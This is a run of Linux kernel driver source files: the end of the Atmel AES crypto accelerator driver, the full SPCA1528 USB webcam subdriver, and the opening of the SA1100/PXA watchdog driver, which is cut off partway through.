		if (sg_copy_from_buffer(dd->out_sg, dd->nb_out_sg,
					dd->buf_out, dd->bufcnt))
			err = 0;
		else
			err = -EINVAL;
		goto cpu_end;
	}
	err = atmel_aes_crypt_dma_stop(dd);
	/* a previously recorded error takes precedence */
	err = dd->err ? : err;
	if (dd->total && !err) {
		if (dd->flags & AES_FLAGS_FAST) {
			/* fast path maps the sg entries directly; step to the next */
			dd->in_sg = sg_next(dd->in_sg);
			dd->out_sg = sg_next(dd->out_sg);
			if (!dd->in_sg || !dd->out_sg)
				err = -EINVAL;
		}
		if (!err)
			err = atmel_aes_crypt_dma_start(dd);
		if (!err)
			return; /* DMA started. Not fininishing. */
	}
cpu_end:
	atmel_aes_finish_req(dd, err);
	atmel_aes_handle_queue(dd, NULL);
}
/*
 * Interrupt handler: acknowledge any enabled pending source and defer
 * the real completion work to the done tasklet.  Returns IRQ_NONE when
 * no enabled source is pending (the line is shared).
 */
static irqreturn_t atmel_aes_irq(int irq, void *dev_id)
{
	struct atmel_aes_dev *aes_dd = dev_id;
	u32 pending;

	pending = atmel_aes_read(aes_dd, AES_ISR);
	if (!(pending & atmel_aes_read(aes_dd, AES_IMR)))
		return IRQ_NONE;

	/* mask the sources we are about to handle */
	atmel_aes_write(aes_dd, AES_IDR, pending);

	if (aes_dd->flags & AES_FLAGS_BUSY)
		tasklet_schedule(&aes_dd->done_task);
	else
		dev_warn(aes_dd->dev, "AES interrupt when no active requests.\n");

	return IRQ_HANDLED;
}
/* Unregister every algorithm registered by atmel_aes_register_algs(). */
static void atmel_aes_unregister_algs(struct atmel_aes_dev *dd)
{
	int i;
	for (i = 0; i < ARRAY_SIZE(aes_algs); i++)
		crypto_unregister_alg(&aes_algs[i]);
	/* cfb64 is only registered on hardware that supports it */
	if (dd->caps.has_cfb64)
		crypto_unregister_alg(&aes_cfb64_alg);
}
/*
 * Register all supported algorithms with the crypto API: every entry of
 * aes_algs[], plus cfb64 when the hardware advertises it.  On failure,
 * unwind whatever was already registered and return the error.
 */
static int atmel_aes_register_algs(struct atmel_aes_dev *dd)
{
	int err, i;

	for (i = 0; i < ARRAY_SIZE(aes_algs); i++) {
		err = crypto_register_alg(&aes_algs[i]);
		if (err)
			goto err_unwind;
	}

	if (dd->caps.has_cfb64) {
		err = crypto_register_alg(&aes_cfb64_alg);
		if (err)
			goto err_unwind;	/* i == ARRAY_SIZE: unwind them all */
	}

	return 0;

err_unwind:
	while (i--)
		crypto_unregister_alg(&aes_algs[i]);
	return err;
}
/*
 * Derive the feature set from the IP revision read at probe time.
 * Unknown revisions fall back to the minimal (v1.2-era) capabilities.
 */
static void atmel_aes_get_cap(struct atmel_aes_dev *dd)
{
	/* safe defaults for the oldest supported IP */
	dd->caps.has_dualbuff = 0;
	dd->caps.has_cfb64 = 0;
	dd->caps.max_burst_size = 1;
	/* keep only major version number */
	switch (dd->hw_version & 0xff0) {
	case 0x130:
		dd->caps.has_dualbuff = 1;
		dd->caps.has_cfb64 = 1;
		dd->caps.max_burst_size = 4;
		break;
	case 0x120:
		break;
	default:
		dev_warn(dd->dev,
			"Unmanaged aes version, set minimum capabilities\n");
		break;
	}
}
/*
 * Platform probe: allocate and initialise the device structure, claim
 * MEM/IRQ resources, clock and buffers, set up DMA, then publish the
 * device and register the crypto algorithms.  Resources are released in
 * reverse order through the cascade of error labels below.
 */
static int atmel_aes_probe(struct platform_device *pdev)
{
	struct atmel_aes_dev *aes_dd;
	struct crypto_platform_data *pdata;
	struct device *dev = &pdev->dev;
	struct resource *aes_res;
	unsigned long aes_phys_size;
	int err;
	pdata = pdev->dev.platform_data;
	if (!pdata) {
		err = -ENXIO;
		goto aes_dd_err;
	}
	aes_dd = kzalloc(sizeof(struct atmel_aes_dev), GFP_KERNEL);
	if (aes_dd == NULL) {
		dev_err(dev, "unable to alloc data struct.\n");
		err = -ENOMEM;
		goto aes_dd_err;
	}
	aes_dd->dev = dev;
	platform_set_drvdata(pdev, aes_dd);
	INIT_LIST_HEAD(&aes_dd->list);
	/* completion and queue-pump work both run in tasklet context */
	tasklet_init(&aes_dd->done_task, atmel_aes_done_task,
					(unsigned long)aes_dd);
	tasklet_init(&aes_dd->queue_task, atmel_aes_queue_task,
					(unsigned long)aes_dd);
	crypto_init_queue(&aes_dd->queue, ATMEL_AES_QUEUE_LENGTH);
	aes_dd->irq = -1;
	/* Get the base address */
	aes_res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
	if (!aes_res) {
		dev_err(dev, "no MEM resource info\n");
		err = -ENODEV;
		goto res_err;
	}
	aes_dd->phys_base = aes_res->start;
	aes_phys_size = resource_size(aes_res);
	/* Get the IRQ */
	aes_dd->irq = platform_get_irq(pdev,  0);
	if (aes_dd->irq < 0) {
		dev_err(dev, "no IRQ resource info\n");
		err = aes_dd->irq;
		goto aes_irq_err;
	}
	/* IRQF_SHARED: the line may be shared with other peripherals */
	err = request_irq(aes_dd->irq, atmel_aes_irq, IRQF_SHARED, "atmel-aes",
			aes_dd);
	if (err) {
		dev_err(dev, "unable to request aes irq.\n");
		goto aes_irq_err;
	}
	/* Initializing the clock */
	aes_dd->iclk = clk_get(&pdev->dev, "aes_clk");
	if (IS_ERR(aes_dd->iclk)) {
		dev_err(dev, "clock intialization failed.\n");
		err = PTR_ERR(aes_dd->iclk);
		goto clk_err;
	}
	aes_dd->io_base = ioremap(aes_dd->phys_base, aes_phys_size);
	if (!aes_dd->io_base) {
		dev_err(dev, "can't ioremap\n");
		err = -ENOMEM;
		goto aes_io_err;
	}
	/* capabilities depend on the IP revision read here */
	atmel_aes_hw_version_init(aes_dd);
	atmel_aes_get_cap(aes_dd);
	err = atmel_aes_buff_init(aes_dd);
	if (err)
		goto err_aes_buff;
	err = atmel_aes_dma_init(aes_dd, pdata);
	if (err)
		goto err_aes_dma;
	/* publish the device so atmel_aes_find_dev() can see it */
	spin_lock(&atmel_aes.lock);
	list_add_tail(&aes_dd->list, &atmel_aes.dev_list);
	spin_unlock(&atmel_aes.lock);
	err = atmel_aes_register_algs(aes_dd);
	if (err)
		goto err_algs;
	dev_info(dev, "Atmel AES\n");
	return 0;
err_algs:
	spin_lock(&atmel_aes.lock);
	list_del(&aes_dd->list);
	spin_unlock(&atmel_aes.lock);
	atmel_aes_dma_cleanup(aes_dd);
err_aes_dma:
	atmel_aes_buff_cleanup(aes_dd);
err_aes_buff:
	iounmap(aes_dd->io_base);
aes_io_err:
	clk_put(aes_dd->iclk);
clk_err:
	free_irq(aes_dd->irq, aes_dd);
aes_irq_err:
res_err:
	tasklet_kill(&aes_dd->done_task);
	tasklet_kill(&aes_dd->queue_task);
	kfree(aes_dd);
	aes_dd = NULL;
aes_dd_err:
	dev_err(dev, "initialization failed.\n");
	return err;
}
/*
 * Platform remove: unpublish the device, unregister the algorithms,
 * then tear down tasklets, DMA, MMIO mapping, clock and IRQ in the
 * reverse order of probe, and free the device structure.
 *
 * Fix: the local device pointer was declared `static`, which made it a
 * single shared variable across all invocations/instances for no
 * reason; it is now an ordinary automatic variable (and the dead
 * trailing NULL assignment after kfree() is gone with it).
 */
static int atmel_aes_remove(struct platform_device *pdev)
{
	struct atmel_aes_dev *aes_dd;

	aes_dd = platform_get_drvdata(pdev);
	if (!aes_dd)
		return -ENODEV;

	/* hide the device from atmel_aes_find_dev() before teardown */
	spin_lock(&atmel_aes.lock);
	list_del(&aes_dd->list);
	spin_unlock(&atmel_aes.lock);

	atmel_aes_unregister_algs(aes_dd);

	tasklet_kill(&aes_dd->done_task);
	tasklet_kill(&aes_dd->queue_task);

	atmel_aes_dma_cleanup(aes_dd);

	iounmap(aes_dd->io_base);
	clk_put(aes_dd->iclk);

	if (aes_dd->irq > 0)
		free_irq(aes_dd->irq, aes_dd);

	kfree(aes_dd);
	return 0;
}
/* Platform driver glue; bound by name against the "atmel_aes" device. */
static struct platform_driver atmel_aes_driver = {
	.probe		= atmel_aes_probe,
	.remove		= atmel_aes_remove,
	.driver		= {
		.name	= "atmel_aes",
		.owner	= THIS_MODULE,
	},
};
module_platform_driver(atmel_aes_driver);
MODULE_DESCRIPTION("Atmel AES hw acceleration support.");
MODULE_LICENSE("GPL v2");
MODULE_AUTHOR("Nicolas Royer - Eukréa Electromatique");
| gpl-2.0 |
elbermu/cerux_kernel-touchwiz | drivers/media/video/gspca/spca1528.c | 3073 | 13931 | /*
* spca1528 subdriver
*
* Copyright (C) 2010 Jean-Francois Moine (http://moinejf.free.fr)
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#define MODULE_NAME "spca1528"
#include "gspca.h"
#include "jpeg.h"
MODULE_AUTHOR("Jean-Francois Moine <http://moinejf.free.fr>");
MODULE_DESCRIPTION("SPCA1528 USB Camera Driver");
MODULE_LICENSE("GPL");
/* specific webcam descriptor */
struct sd {
	struct gspca_dev gspca_dev;	/* !! must be the first item */
	/* cached V4L2 control values, pushed to the sensor by set*() */
	u8 brightness;
	u8 contrast;
	u8 hue;
	u8 color;
	u8 sharpness;
	u8 pkt_seq;			/* expected even/odd image bit, see sd_pkt_scan */
	u8 jpeg_hdr[JPEG_HDR_SZ];	/* prebuilt JPEG header prepended to each frame */
};
/* V4L2 controls supported by the driver */
static int sd_setbrightness(struct gspca_dev *gspca_dev, __s32 val);
static int sd_getbrightness(struct gspca_dev *gspca_dev, __s32 *val);
static int sd_setcontrast(struct gspca_dev *gspca_dev, __s32 val);
static int sd_getcontrast(struct gspca_dev *gspca_dev, __s32 *val);
static int sd_sethue(struct gspca_dev *gspca_dev, __s32 val);
static int sd_gethue(struct gspca_dev *gspca_dev, __s32 *val);
static int sd_setcolor(struct gspca_dev *gspca_dev, __s32 val);
static int sd_getcolor(struct gspca_dev *gspca_dev, __s32 *val);
static int sd_setsharpness(struct gspca_dev *gspca_dev, __s32 val);
static int sd_getsharpness(struct gspca_dev *gspca_dev, __s32 *val);
/*
 * V4L2 control table.  Each entry couples the control description with
 * the set/get callbacks defined near the end of this file; the *_DEF
 * macros double as the reset values used in sd_config().
 */
static const struct ctrl sd_ctrls[] = {
	{
	    {
		.id      = V4L2_CID_BRIGHTNESS,
		.type    = V4L2_CTRL_TYPE_INTEGER,
		.name    = "Brightness",
		.minimum = 0,
		.maximum = 255,
		.step    = 1,
#define BRIGHTNESS_DEF 128
		.default_value = BRIGHTNESS_DEF,
	    },
	    .set = sd_setbrightness,
	    .get = sd_getbrightness,
	},
	{
	    {
		.id      = V4L2_CID_CONTRAST,
		.type    = V4L2_CTRL_TYPE_INTEGER,
		.name    = "Contrast",
		.minimum = 0,
		.maximum = 8,
		.step    = 1,
#define CONTRAST_DEF 1
		.default_value = CONTRAST_DEF,
	    },
	    .set = sd_setcontrast,
	    .get = sd_getcontrast,
	},
	{
	    {
		.id      = V4L2_CID_HUE,
		.type    = V4L2_CTRL_TYPE_INTEGER,
		.name    = "Hue",
		.minimum = 0,
		.maximum = 255,
		.step    = 1,
#define HUE_DEF 0
		.default_value = HUE_DEF,
	    },
	    .set = sd_sethue,
	    .get = sd_gethue,
	},
	{
	    {
		.id      = V4L2_CID_SATURATION,
		.type    = V4L2_CTRL_TYPE_INTEGER,
		.name    = "Saturation",
		.minimum = 0,
		.maximum = 8,
		.step    = 1,
#define COLOR_DEF 1
		.default_value = COLOR_DEF,
	    },
	    .set = sd_setcolor,
	    .get = sd_getcolor,
	},
	{
	    {
		.id      = V4L2_CID_SHARPNESS,
		.type    = V4L2_CTRL_TYPE_INTEGER,
		.name    = "Sharpness",
		.minimum = 0,
		.maximum = 255,
		.step    = 1,
#define SHARPNESS_DEF 0
		.default_value = SHARPNESS_DEF,
	    },
	    .set = sd_setsharpness,
	    .get = sd_getsharpness,
	},
};
/*
 * Supported frame formats.  .priv carries the mode index written to the
 * camera in sd_isoc_init(); .sizeimage budgets for the worst-case JPEG
 * plus the 590-byte header.
 */
static const struct v4l2_pix_format vga_mode[] = {
/* (does not work correctly)
	{176, 144, V4L2_PIX_FMT_JPEG, V4L2_FIELD_NONE,
		.bytesperline = 176,
		.sizeimage = 176 * 144 * 5 / 8 + 590,
		.colorspace = V4L2_COLORSPACE_JPEG,
		.priv = 3},
*/
	{320, 240, V4L2_PIX_FMT_JPEG, V4L2_FIELD_NONE,
		.bytesperline = 320,
		.sizeimage = 320 * 240 * 4 / 8 + 590,
		.colorspace = V4L2_COLORSPACE_JPEG,
		.priv = 2},
	{640, 480, V4L2_PIX_FMT_JPEG, V4L2_FIELD_NONE,
		.bytesperline = 640,
		.sizeimage = 640 * 480 * 3 / 8 + 590,
		.colorspace = V4L2_COLORSPACE_JPEG,
		.priv = 1},
};
/* read <len> bytes to gspca usb_buf */
/*
 * Vendor-IN control transfer into gspca_dev->usb_buf.  A previous USB
 * error (usb_err < 0) short-circuits the call; a new failure is latched
 * into usb_err so later calls become no-ops.
 */
static void reg_r(struct gspca_dev *gspca_dev,
			u8 req,
			u16 index,
			int len)
{
#if USB_BUF_SZ < 64
#error "USB buffer too small"
#endif
	struct usb_device *dev = gspca_dev->dev;
	int ret;
	if (gspca_dev->usb_err < 0)
		return;
	ret = usb_control_msg(dev, usb_rcvctrlpipe(dev, 0),
			req,
			USB_DIR_IN | USB_TYPE_VENDOR | USB_RECIP_DEVICE,
			0x0000,			/* value */
			index,
			gspca_dev->usb_buf, len,
			500);
	PDEBUG(D_USBI, "GET %02x 0000 %04x %02x", req, index,
			gspca_dev->usb_buf[0]);
	if (ret < 0) {
		err("reg_r err %d", ret);
		gspca_dev->usb_err = ret;
	}
}
/*
 * Vendor-OUT control transfer with no data stage.  Latches failures
 * into gspca_dev->usb_err like reg_r().
 */
static void reg_w(struct gspca_dev *gspca_dev,
			u8 req,
			u16 value,
			u16 index)
{
	struct usb_device *dev = gspca_dev->dev;
	int ret;
	if (gspca_dev->usb_err < 0)
		return;
	PDEBUG(D_USBO, "SET %02x %04x %04x", req, value, index);
	ret = usb_control_msg(dev, usb_sndctrlpipe(dev, 0),
			req,
			USB_DIR_OUT | USB_TYPE_VENDOR | USB_RECIP_DEVICE,
			value, index,
			NULL, 0, 500);
	if (ret < 0) {
		err("reg_w err %d", ret);
		gspca_dev->usb_err = ret;
	}
}
/*
 * Vendor-OUT control transfer carrying a single data byte (staged in
 * gspca_dev->usb_buf).  Latches failures into usb_err like reg_r().
 *
 * Fix: the failure message used to say "reg_w err", pointing the
 * reader at the wrong helper when debugging; it now names reg_wb.
 */
static void reg_wb(struct gspca_dev *gspca_dev,
			u8 req,
			u16 value,
			u16 index,
			u8 byte)
{
	struct usb_device *dev = gspca_dev->dev;
	int ret;
	if (gspca_dev->usb_err < 0)
		return;
	PDEBUG(D_USBO, "SET %02x %04x %04x %02x", req, value, index, byte);
	gspca_dev->usb_buf[0] = byte;
	ret = usb_control_msg(dev, usb_sndctrlpipe(dev, 0),
			req,
			USB_DIR_OUT | USB_TYPE_VENDOR | USB_RECIP_DEVICE,
			value, index,
			gspca_dev->usb_buf, 1, 500);
	if (ret < 0) {
		err("reg_wb err %d", ret);
		gspca_dev->usb_err = ret;
	}
}
/*
 * Poll camera status register 0x21/0x0000 until it reads zero,
 * retrying up to 20 times with 30ms pauses.  On timeout the shared
 * usb_err is set to -ETIME so subsequent register accesses bail out.
 */
static void wait_status_0(struct gspca_dev *gspca_dev)
{
	int retries = 20;

	while (retries-- > 0) {
		reg_r(gspca_dev, 0x21, 0x0000, 1);
		if (gspca_dev->usb_buf[0] == 0)
			return;
		msleep(30);
	}
	PDEBUG(D_ERR, "wait_status_0 timeout");
	gspca_dev->usb_err = -ETIME;
}
/*
 * Poll camera status register 0x21/0x0001 until it reads one (up to 10
 * tries, 10ms apart), then acknowledge by writing it back to zero and
 * re-reading.  On timeout, latch -ETIME into usb_err.
 */
static void wait_status_1(struct gspca_dev *gspca_dev)
{
	int retries = 10;

	while (retries-- > 0) {
		reg_r(gspca_dev, 0x21, 0x0001, 1);
		msleep(10);
		if (gspca_dev->usb_buf[0] == 1) {
			/* acknowledge and confirm */
			reg_wb(gspca_dev, 0x21, 0x0000, 0x0001, 0x00);
			reg_r(gspca_dev, 0x21, 0x0001, 1);
			return;
		}
	}
	PDEBUG(D_ERR, "wait_status_1 timeout");
	gspca_dev->usb_err = -ETIME;
}
/*
 * Push the cached control values to the camera.  Each control uses its
 * own vendor request; note hue writes index 0x0000 while the others
 * mirror the request in the index — presumably intentional per the
 * vendor protocol, TODO confirm against a USB trace.
 */
static void setbrightness(struct gspca_dev *gspca_dev)
{
	struct sd *sd = (struct sd *) gspca_dev;
	reg_wb(gspca_dev, 0xc0, 0x0000, 0x00c0, sd->brightness);
}
static void setcontrast(struct gspca_dev *gspca_dev)
{
	struct sd *sd = (struct sd *) gspca_dev;
	reg_wb(gspca_dev, 0xc1, 0x0000, 0x00c1, sd->contrast);
}
static void sethue(struct gspca_dev *gspca_dev)
{
	struct sd *sd = (struct sd *) gspca_dev;
	reg_wb(gspca_dev, 0xc2, 0x0000, 0x0000, sd->hue);
}
static void setcolor(struct gspca_dev *gspca_dev)
{
	struct sd *sd = (struct sd *) gspca_dev;
	reg_wb(gspca_dev, 0xc3, 0x0000, 0x00c3, sd->color);
}
static void setsharpness(struct gspca_dev *gspca_dev)
{
	struct sd *sd = (struct sd *) gspca_dev;
	reg_wb(gspca_dev, 0xc4, 0x0000, 0x00c4, sd->sharpness);
}
/* this function is called at probe time */
/*
 * Fill in the camera description (frame formats, packets per ISOC
 * message, alternate setting) and reset all controls to their defaults.
 */
static int sd_config(struct gspca_dev *gspca_dev,
			const struct usb_device_id *id)
{
	struct sd *sd = (struct sd *) gspca_dev;
	gspca_dev->cam.cam_mode = vga_mode;
	gspca_dev->cam.nmodes = ARRAY_SIZE(vga_mode);
	gspca_dev->cam.npkt = 128; /* number of packets per ISOC message */
				/*fixme: 256 in ms-win traces*/
	sd->brightness = BRIGHTNESS_DEF;
	sd->contrast = CONTRAST_DEF;
	sd->hue = HUE_DEF;
	sd->color = COLOR_DEF;
	sd->sharpness = SHARPNESS_DEF;
	gspca_dev->nbalt = 4;		/* use alternate setting 3 */
	return 0;
}
/* this function is called at probe and resume time */
/*
 * Hardware bring-up sequence replayed from USB traces: a pair of writes
 * to the 0x206x register window, then identification reads (the probe
 * log prints two strings found in the 64-byte response).
 * Returns the latched usb_err (0 when every transfer succeeded).
 */
static int sd_init(struct gspca_dev *gspca_dev)
{
	reg_w(gspca_dev, 0x00, 0x0001, 0x2067);
	reg_w(gspca_dev, 0x00, 0x00d0, 0x206b);
	reg_w(gspca_dev, 0x00, 0x0000, 0x206c);
	reg_w(gspca_dev, 0x00, 0x0001, 0x2069);
	msleep(8);
	reg_w(gspca_dev, 0x00, 0x00c0, 0x206b);
	reg_w(gspca_dev, 0x00, 0x0000, 0x206c);
	reg_w(gspca_dev, 0x00, 0x0001, 0x2069);
	reg_r(gspca_dev, 0x20, 0x0000, 1);
	reg_r(gspca_dev, 0x20, 0x0000, 5);
	reg_r(gspca_dev, 0x23, 0x0000, 64);
	PDEBUG(D_PROBE, "%s%s", &gspca_dev->usb_buf[0x1c],
				&gspca_dev->usb_buf[0x30]);
	reg_r(gspca_dev, 0x23, 0x0001, 64);
	return gspca_dev->usb_err;
}
/* function called at start time before URB creation */
/*
 * Program the capture mode: select the frame size index stored in the
 * current v4l2_pix_format's .priv field, framed by the usual
 * status-handshake sequence.  Returns the latched usb_err.
 */
static int sd_isoc_init(struct gspca_dev *gspca_dev)
{
	u8 mode;
	reg_r(gspca_dev, 0x00, 0x2520, 1);
	wait_status_0(gspca_dev);
	reg_w(gspca_dev, 0xc5, 0x0003, 0x0000);
	wait_status_1(gspca_dev);
	wait_status_0(gspca_dev);
	mode = gspca_dev->cam.cam_mode[gspca_dev->curr_mode].priv;
	reg_wb(gspca_dev, 0x25, 0x0000, 0x0004, mode);
	reg_r(gspca_dev, 0x25, 0x0004, 1);
	reg_wb(gspca_dev, 0x27, 0x0000, 0x0000, 0x06);
	reg_r(gspca_dev, 0x27, 0x0000, 1);
	return gspca_dev->usb_err;
}
/* -- start the camera -- */
/*
 * Build the JPEG header for the selected resolution, push all cached
 * controls to the sensor, then issue the start-capture command framed
 * by the status handshake.  Resets pkt_seq so the first frame's
 * even/odd bit is accepted.  Returns the latched usb_err.
 */
static int sd_start(struct gspca_dev *gspca_dev)
{
	struct sd *sd = (struct sd *) gspca_dev;
	/* initialize the JPEG header */
	jpeg_define(sd->jpeg_hdr, gspca_dev->height, gspca_dev->width,
			0x22);		/* JPEG 411 */
	/* the JPEG quality seems to be 82% */
	jpeg_set_qual(sd->jpeg_hdr, 82);
	/* set the controls */
	setbrightness(gspca_dev);
	setcontrast(gspca_dev);
	sethue(gspca_dev);
	setcolor(gspca_dev);
	setsharpness(gspca_dev);
	msleep(5);
	reg_r(gspca_dev, 0x00, 0x2520, 1);
	msleep(8);
	/* start the capture */
	wait_status_0(gspca_dev);
	reg_w(gspca_dev, 0x31, 0x0000, 0x0004);
	wait_status_1(gspca_dev);
	wait_status_0(gspca_dev);
	msleep(200);
	sd->pkt_seq = 0;
	return gspca_dev->usb_err;
}
/* Issue the stop-capture command with the same status handshake. */
static void sd_stopN(struct gspca_dev *gspca_dev)
{
	/* stop the capture */
	wait_status_0(gspca_dev);
	reg_w(gspca_dev, 0x31, 0x0000, 0x0000);
	wait_status_1(gspca_dev);
	wait_status_0(gspca_dev);
}
/* move a packet adding 0x00 after 0xff */
/*
 * JPEG byte-stuffing on the fly: whenever a 0xff appears in the data,
 * emit everything up to and including it, then overwrite the 0xff's
 * slot in the remaining buffer with the stuffed 0x00 (the 0x00 takes
 * the old byte's position, so len is reduced by i, not i + 1) and keep
 * scanning.  The tail is flushed after the loop.
 */
static void add_packet(struct gspca_dev *gspca_dev,
			u8 *data,
			int len)
{
	int i;
	i = 0;
	do {
		if (data[i] == 0xff) {
			gspca_frame_add(gspca_dev, INTER_PACKET,
					data, i + 1);
			len -= i;
			data += i;
			*data = 0x00;	/* stuffed zero replaces the 0xff slot */
			i = 0;
		}
	} while (++i < len);
	gspca_frame_add(gspca_dev, INTER_PACKET, data, len);
}
/*
 * Isochronous packet parser.  Valid image packets start with 0x02 8n;
 * bit0 of the second byte alternates between even/odd images and bit1
 * marks the final packet of an image.  Out-of-sequence packets discard
 * the current frame.  A synthetic ffd9 (EOI) closes each frame since
 * the camera stream does not carry one.
 */
static void sd_pkt_scan(struct gspca_dev *gspca_dev,
			u8 *data,			/* isoc packet */
			int len)			/* iso packet length */
{
	struct sd *sd = (struct sd *) gspca_dev;
	static const u8 ffd9[] = {0xff, 0xd9};
	/* image packets start with:
	 *	02 8n
	 * with <n> bit:
	 *	0x01: even (0) / odd (1) image
	 *	0x02: end of image when set
	 */
	if (len < 3)
		return;			/* empty packet */
	if (*data == 0x02) {
		if (data[1] & 0x02) {
			/* last packet: expect the other parity next image */
			sd->pkt_seq = !(data[1] & 1);
			add_packet(gspca_dev, data + 2, len - 2);
			gspca_frame_add(gspca_dev, LAST_PACKET,
					ffd9, 2);
			return;
		}
		if ((data[1] & 1) != sd->pkt_seq)
			goto err;
		if (gspca_dev->last_packet_type == LAST_PACKET)
			gspca_frame_add(gspca_dev, FIRST_PACKET,
					sd->jpeg_hdr, JPEG_HDR_SZ);
		add_packet(gspca_dev, data + 2, len - 2);
		return;
	}
err:
	gspca_dev->last_packet_type = DISCARD_PACKET;
}
/*
 * V4L2 control callbacks referenced by sd_ctrls[].  Setters cache the
 * value and, when streaming, push it to the camera immediately (the
 * return propagates any latched USB error); getters just report the
 * cached value.
 */
static int sd_setbrightness(struct gspca_dev *gspca_dev, __s32 val)
{
	struct sd *sd = (struct sd *) gspca_dev;
	sd->brightness = val;
	if (gspca_dev->streaming)
		setbrightness(gspca_dev);
	return gspca_dev->usb_err;
}
static int sd_getbrightness(struct gspca_dev *gspca_dev, __s32 *val)
{
	struct sd *sd = (struct sd *) gspca_dev;
	*val = sd->brightness;
	return 0;
}
static int sd_setcontrast(struct gspca_dev *gspca_dev, __s32 val)
{
	struct sd *sd = (struct sd *) gspca_dev;
	sd->contrast = val;
	if (gspca_dev->streaming)
		setcontrast(gspca_dev);
	return gspca_dev->usb_err;
}
static int sd_getcontrast(struct gspca_dev *gspca_dev, __s32 *val)
{
	struct sd *sd = (struct sd *) gspca_dev;
	*val = sd->contrast;
	return 0;
}
static int sd_sethue(struct gspca_dev *gspca_dev, __s32 val)
{
	struct sd *sd = (struct sd *) gspca_dev;
	sd->hue = val;
	if (gspca_dev->streaming)
		sethue(gspca_dev);
	return gspca_dev->usb_err;
}
static int sd_gethue(struct gspca_dev *gspca_dev, __s32 *val)
{
	struct sd *sd = (struct sd *) gspca_dev;
	*val = sd->hue;
	return 0;
}
static int sd_setcolor(struct gspca_dev *gspca_dev, __s32 val)
{
	struct sd *sd = (struct sd *) gspca_dev;
	sd->color = val;
	if (gspca_dev->streaming)
		setcolor(gspca_dev);
	return gspca_dev->usb_err;
}
static int sd_getcolor(struct gspca_dev *gspca_dev, __s32 *val)
{
	struct sd *sd = (struct sd *) gspca_dev;
	*val = sd->color;
	return 0;
}
static int sd_setsharpness(struct gspca_dev *gspca_dev, __s32 val)
{
	struct sd *sd = (struct sd *) gspca_dev;
	sd->sharpness = val;
	if (gspca_dev->streaming)
		setsharpness(gspca_dev);
	return gspca_dev->usb_err;
}
static int sd_getsharpness(struct gspca_dev *gspca_dev, __s32 *val)
{
	struct sd *sd = (struct sd *) gspca_dev;
	*val = sd->sharpness;
	return 0;
}
/* sub-driver description */
static const struct sd_desc sd_desc = {
	.name = MODULE_NAME,
	.ctrls = sd_ctrls,
	.nctrls = ARRAY_SIZE(sd_ctrls),
	.config = sd_config,
	.init = sd_init,
	.isoc_init = sd_isoc_init,
	.start = sd_start,
	.stopN = sd_stopN,
	.pkt_scan = sd_pkt_scan,
};
/* -- module initialisation -- */
static const struct usb_device_id device_table[] = {
	{USB_DEVICE(0x04fc, 0x1528)},
	{}
};
MODULE_DEVICE_TABLE(usb, device_table);
/* -- device connect -- */
/*
 * Probe: this device exposes several interfaces; only interface 1
 * carries the isochronous video endpoints, so every other interface is
 * rejected before handing over to the gspca core.
 */
static int sd_probe(struct usb_interface *intf,
			const struct usb_device_id *id)
{
	/* the video interface for isochronous transfer is 1 */
	if (intf->cur_altsetting->desc.bInterfaceNumber != 1)
		return -ENODEV;
	return gspca_dev_probe2(intf, id, &sd_desc, sizeof(struct sd),
				THIS_MODULE);
}
/* USB driver glue; suspend/resume are handled by the gspca core. */
static struct usb_driver sd_driver = {
	.name = MODULE_NAME,
	.id_table = device_table,
	.probe = sd_probe,
	.disconnect = gspca_disconnect,
#ifdef CONFIG_PM
	.suspend = gspca_suspend,
	.resume = gspca_resume,
#endif
};
/* -- module insert / remove -- */
static int __init sd_mod_init(void)
{
	return usb_register(&sd_driver);
}
static void __exit sd_mod_exit(void)
{
	usb_deregister(&sd_driver);
}
module_init(sd_mod_init);
module_exit(sd_mod_exit);
| gpl-2.0 |
akshay-shah/android_kernel_samsung_crater | drivers/watchdog/sa1100_wdt.c | 4865 | 4569 | /*
* Watchdog driver for the SA11x0/PXA2xx
*
* (c) Copyright 2000 Oleg Drokin <green@crimea.edu>
* Based on SoftDog driver by Alan Cox <alan@lxorguk.ukuu.org.uk>
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version
* 2 of the License, or (at your option) any later version.
*
* Neither Oleg Drokin nor iXcelerator.com admit liability nor provide
* warranty for any of this software. This material is provided
* "AS-IS" and at no charge.
*
* (c) Copyright 2000 Oleg Drokin <green@crimea.edu>
*
* 27/11/2000 Initial release
*/
#include <linux/module.h>
#include <linux/moduleparam.h>
#include <linux/types.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/miscdevice.h>
#include <linux/watchdog.h>
#include <linux/init.h>
#include <linux/bitops.h>
#include <linux/uaccess.h>
#include <linux/timex.h>
#ifdef CONFIG_ARCH_PXA
#include <mach/regs-ost.h>
#endif
#include <mach/reset.h>
#include <mach/hardware.h>
static unsigned long oscr_freq;		/* OS timer ticks per second */
static unsigned long sa1100wdt_users;	/* bit 1 set while the device is open */
static unsigned int pre_margin;		/* timeout expressed in OSCR ticks */
static int boot_status;			/* WDIOF_CARDRESET if last reset was the watchdog */
/*
 * Allow only one person to hold it open
 */
/*
 * Opening the device arms the hardware watchdog: OSMR3 is set one
 * margin ahead of the free-running OSCR and the watchdog-mode enable
 * (OWER_WME) is latched — from here on it can never be disarmed.
 */
static int sa1100dog_open(struct inode *inode, struct file *file)
{
	if (test_and_set_bit(1, &sa1100wdt_users))
		return -EBUSY;
	/* Activate SA1100 Watchdog timer */
	OSMR3 = OSCR + pre_margin;
	OSSR = OSSR_M3;
	OWER = OWER_WME;
	OIER |= OIER_E3;
	return nonseekable_open(inode, file);
}
/*
 *	The watchdog cannot be disabled.
 *
 *	Previous comments suggested that turning off the interrupt by
 *	clearing OIER[E3] would prevent the watchdog timing out but this
 *	does not appear to be true (at least on the PXA255).
 */
static int sa1100dog_release(struct inode *inode, struct file *file)
{
	printk(KERN_CRIT "WATCHDOG: Device closed - timer will not stop\n");
	clear_bit(1, &sa1100wdt_users);
	return 0;
}
/* Any write counts as a keepalive: push the match register forward. */
static ssize_t sa1100dog_write(struct file *file, const char __user *data,
						size_t len, loff_t *ppos)
